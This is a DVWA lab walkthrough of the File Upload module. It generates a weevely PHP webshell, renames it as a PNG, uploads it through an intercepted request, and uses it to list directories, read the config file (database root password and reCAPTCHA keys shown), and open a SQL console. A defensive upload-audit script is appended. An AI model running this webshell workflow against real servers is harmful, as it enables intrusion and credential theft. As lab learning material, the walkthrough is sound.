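Beginner's guide: DVWA-1.9 all-levels tutorial, File Upload. In my own test under PHP7, China Chopper (中国菜刀) produced no result, so here I introduce weevely instead.
Straight to the commands. Generate the webshell: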
➜ ~ weevely generate weevely hello.php
➜ ~ cd /usr/share/weevely
➜ ~ mv hello.php hello.png
Intercept the request.
Change the filename, then upload.
Then continue with weevely:
➜ weevely weevely http://192.168.56.101/DVWA/hackable/uploads/hello.php weevely
[+] weevely 3.7.0
[+] Target: 192.168.56.101
[+] Session: /root/.weevely/sessions/192.168.56.101/hello_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> dir
???? D ?????±???
??????C022-AA4B
D:\xampp\htdocs\DVWA\hackable\uploads ????
2019-04-22 20:50 <DIR> .
2019-04-22 20:50 <DIR> ..
2019-04-22 18:03 32 1.php
2019-04-22 16:14 31 1.php%00.png
2019-02-06 16:11 667 dvwa_email.png
2019-04-22 20:46 17,919 hack.png
2019-04-22 20:50 698 hello.php
2019-04-22 20:21 17,220 ?±¨.png
6 ???? 36,567 ??
2 ???? 145,805,955,072 ????
majx2704:D:\xampp\htdocs\DVWA\hackable\uploads $ whoami
cn\majx2
At this point we already have the webshell. Continuing:
majx2704:D:\xampp\htdocs\DVWA\hackable\uploads $ cd ../../config
majx2704:D:\xampp\htdocs\DVWA\config $ dir
Ƚ¶¯Ƿ D אµľԐ±뇩¡£
¾�ѲºƊŠC022-AA4B
D:\xampp\htdocs\DVWA\config µń¿¼
2019-04-15 15:11 <DIR> .
2019-04-15 15:11 <DIR> ..
2019-04-22 10:00 1,930 config.inc.php
2019-04-16 21:49 1,924 config.inc.php.bak
2019-02-06 16:11 1,857 config.inc.php.dist
3 ¸þ 5,711 ؖ½
2 ¸¼ 145,788,071,936 ¿ʓėֽ
majx2704:D:\xampp\htdocs\DVWA\config $ type config.inc.php
<?php
# If you are having problems connecting to the MySQL database and all of the variables below are correct
# try changing the 'db_server' variable from localhost to 127.0.0.1. Fixes a problem due to sockets.
# Thanks to @digininja for the fix.
# Database management system to use
$DBMS = 'MySQL';
#$DBMS = 'PGSQL'; // Currently disabled
# Database variables
# WARNING: The database specified under db_database WILL BE ENTIRELY DELETED during setup.
# Please use a database dedicated to DVWA.
#
# If you are using MariaDB then you cannot use root, you must use create a dedicated DVWA user.
# See README.md for more information on this.
$_DVWA = array();
$_DVWA[ 'db_server' ] = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = '123456';
# Only used with PostgreSQL/PGSQL database selection.
$_DVWA[ 'db_port '] = '3306';
# ReCAPTCHA settings
# Used for the 'Insecure CAPTCHA' module
# You'll need to generate your own keys at: https://www.google.com/recaptcha/admin
$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';
# Default security level
# Default value for the secuirty level with each session.
# The default is 'impossible'. You may wish to set this to either 'low', 'medium', 'high' or impossible'.
$_DVWA[ 'default_security_level' ] = 'high';
# Default PHPIDS status
# PHPIDS status with each session.
# The default is 'disabled'. You can set this to be either 'enabled' or 'disabled'.
$_DVWA[ 'default_phpids_level' ] = 'disabled';
# Verbose PHPIDS messages
# Enabling this will show why the WAF blocked the request on the blocked request.
# The default is 'disabled'. You can set this to be either 'true' or 'false'.
$_DVWA[ 'default_phpids_verbose' ] = 'false';
?>
majx2704:D:\xampp\htdocs\DVWA\hackable\uploads $ :sql_console -host 127.0.0.1 -user root -passwd 123456
root@localhost SQL> select user()
+----------------+
| root@localhost |
+----------------+
There are many more features, mainly aimed at the Linux platform. You can view them with --help.
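From the defender's side, an uploads directory like the one listed above can be audited for exactly these artifacts. The following is an added example, not part of the original post or of DVWA or weevely: it flags script extensions, encoded null-byte names, image-named files whose bytes are not an image, and files containing a PHP open tag. The function names and the sample files are constructed for illustration.

```python
import os
import tempfile

# Magic bytes for the image types an image-upload form should accept.
IMAGE_MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff",
               ".jpeg": b"\xff\xd8\xff"}
SCRIPT_EXTS = {".php", ".php5", ".phtml", ".phar"}


def audit_file(path):
    """Return the list of findings for one file in an upload directory."""
    name = os.path.basename(path).lower()
    with open(path, "rb") as fh:
        data = fh.read()
    findings = []
    # Check every dot-separated part, so 1.php%00.png is caught as well.
    parts = {"." + p for p in name.replace("%00", ".").split(".")[1:]}
    if parts & SCRIPT_EXTS:
        findings.append("script-extension")
    if "%00" in name:
        findings.append("null-byte-name")
    ext = os.path.splitext(name)[1]
    if ext in IMAGE_MAGIC and not data.startswith(IMAGE_MAGIC[ext]):
        findings.append("magic-mismatch")
    if b"<?php" in data.lower():
        findings.append("php-open-tag")
    return findings


def audit_dir(root):
    """Map file name -> findings for every flagged regular file in root."""
    report = {}
    for entry in sorted(os.listdir(root)):
        path = os.path.join(root, entry)
        if os.path.isfile(path) and (found := audit_file(path)):
            report[entry] = found
    return report


def build_sample_dir():
    """Constructed sample reusing file names from the listing above."""
    root = tempfile.mkdtemp()
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    stub = b"<?php /* constructed placeholder, no functionality */ ?>"
    for name, body in [("dvwa_email.png", png), ("hello.png", stub),
                       ("hello.php", stub), ("1.php%00.png", stub)]:
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    return root
```

Calling audit_dir(build_sample_dir()) reports three of the four sample files; on a real server, point audit_dir at the uploads path and treat any script-extension finding there as an incident to investigate.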
The End !